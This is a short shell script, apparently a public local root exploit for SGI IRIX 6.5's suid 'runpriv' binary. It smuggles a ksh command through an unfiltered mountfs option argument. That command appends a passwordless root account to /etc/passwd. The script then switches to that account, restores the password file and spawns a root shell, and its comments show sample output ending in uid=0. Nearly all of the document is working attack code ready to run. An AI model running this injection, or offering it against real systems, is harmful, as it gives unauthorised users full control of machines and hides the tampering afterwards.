#!/bin/sh # SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit # ======================================================= # 'runpriv' checks to see if you have been granted privilege, # and if so it runs the command privilege found in the # directory /usr/sysadm/privbin with the remaining arguments. # # 'runpriv' is a suid root binary in a default installation # of IRIX 6.5, runpriv does not filter shell escape sequences # before passing them as arguements to privileges and allows # for the executing of arbitrary commands as root by authorised # users. This exploit assumes the user has the mountfs privilege # which can be enabled by root with the following command. # # "/usr/sysadm/bin/addpriv user mountfs" # # Example. # -bash-2.05b$ id # uid=16071(user) gid=20(user) # -bash-2.05b$ uname -a # IRIX64 IRIS 6.5 04101931 IP30 # -bash-2.05b$ ./xrunpriv.sh # [ SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit # [ Creating cleanup and shell scripts # [ game over # # id # uid=0(root) gid=0(sys) # # - prdelka echo [ SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit echo [ Creating cleanup and shell scripts rm -rf /tmp/passwd123 rm -rf /tmp/rootcmd.sh cp /etc/passwd /tmp/passwd123 echo "#!/bin/sh" >> /tmp/rootcmd.sh echo "mv /tmp/passwd123 /etc/passwd" >> /tmp/rootcmd.sh echo "chmod 644 /etc/passwd" >> /tmp/rootcmd.sh echo "chown root:sys /etc/passwd" >> /tmp/rootcmd.sh echo "rm -rf /tmp/rootcmd.sh" >> /tmp/rootcmd.sh echo "/bin/sh" >> /tmp/rootcmd.sh chmod +x /tmp/rootcmd.sh /usr/sysadm/bin/runpriv mountfs -s test -d / -o \|"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" echo [ game over su r00t -c /tmp/rootcmd.sh rm -rf /tmp/passwd123 rm -rf /tmp/rootcmd.sh